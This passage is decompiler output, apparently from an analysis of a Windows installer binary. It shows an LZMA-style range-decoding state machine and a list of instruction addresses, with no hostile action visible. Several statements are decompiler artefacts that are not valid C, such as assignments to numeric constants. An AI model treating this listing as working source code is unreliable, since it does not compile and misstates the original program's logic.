							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406d5f
0x00406d5f
0x00406d64
0x00406ddb
0x00406de2
0x00406dec
0x004073cb
0x004073cb
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00407441
0x00407441
0x00407447
0x00407447
0x00000000
0x0040741c
0x0040741c
0x00407420
0x004075cf
0x00000000
0x004075cf
0x0040742c
0x00407433
0x0040743b
0x0040743e
0x00000000
0x0040743e
0x00406d66
0x00406d66
0x00406d6a
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d8b
0x00406d92
0x00406d95
0x00406da0
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406daf
0x00406dcd
0x00406dcf
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe1
0x00406fe4
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406ff4
0x00406ff7
0x00406f9a
0x00406fa0
0x00000000
0x00000000
0x00000000
0x00406ff9
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f97
0x00000000
0x00406f97
0x00406db1
0x00406db1
0x00406db4
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406ea3
0x00406ea6
0x00406e1d
0x00406e1d
0x00406e23
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f1d
0x00406f20
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f30
0x00406f33
0x00406eb1
0x00406eb5
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed3
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3e
0x00406f3e
0x00406f41
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x0040710a
0x0040710a
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x00406e2f
0x00000000
0x00000000
0x00000000
